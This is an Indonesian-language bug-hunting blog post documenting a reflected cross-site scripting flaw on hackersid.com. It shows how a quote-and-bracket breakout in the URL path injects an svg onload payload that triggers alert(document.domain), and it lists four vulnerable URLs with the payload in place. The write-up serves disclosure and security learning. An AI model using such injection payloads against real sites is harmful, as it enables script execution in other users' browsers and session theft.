HackersID.com Reflected XSS PoC

Learn System Security - Halo sobat Bug Hunter, apa kababarnya nya? semoga baik-baik aja ya. Udah pada tau HackersID.com kan? situs tempat mirror terbaru yang kurang lebih udah rilis sekitar 1/2 minggu yang lalu. Disini saya menemukan Bug Reflected XSS yang ada pada 4 URL, simak saja kelanjutannya dibawah.

Saat itu saya sedang melihat-lihat mirror disana, saya melihat mirror dari team Admin dan saya mendapatkan URL seperti dibawah ini:

• http://hackersid.com/archive/team/admin/1

Perhatikan source code dari halaman tersebut, fokus ke arah yang saya beri warna biru.

Lalu saya coba mengganti nama team di URL yang tadi menjadi yay,

• http://hackersid.com/archive/team/yay/1

Lihat source codenya ikut berubah.

Saya coba untuk menutup tag dengan kode ">

• http://hackersid.com/archive/team/yay">/1

Wow manjav, ternyata tertutup juga lol.

Saya menggunakan Payloads dibawah ini untuk mendapatkan XSS pada halaman tersebut:

• yay"><svg onload=alert(document.domain)>

Berikut ini URL lengkap dengan Payloads XSS:

• http://hackersid.com/archive/team/yay"><svg onload=alert(document.domain)>/1

Screenshot:

Source code dari halaman yang terjadi XSS:

Dan setelah saya keliling untuk melihat semua struktur URL di HackersID.com, saya mendapatkan 4 URL yang mempunyai Bug Reflected XSS, sepert dibawah ini:

• http://hackersid.com/archive/team/yay"><svg onload=alert(document.domain)>/1
• http://hackersid.com/onhold/team/yay"><svg onload=alert(document.domain)>/1
• http://hackersid.com/archive/notifier/yay"><svg onload=alert(document.domain)>/1
• http://hackersid.com/onhold/notifier/yay"><svg onload=alert(document.domain)>/1

Sekian dari saya, Happy Bug Hunting guys.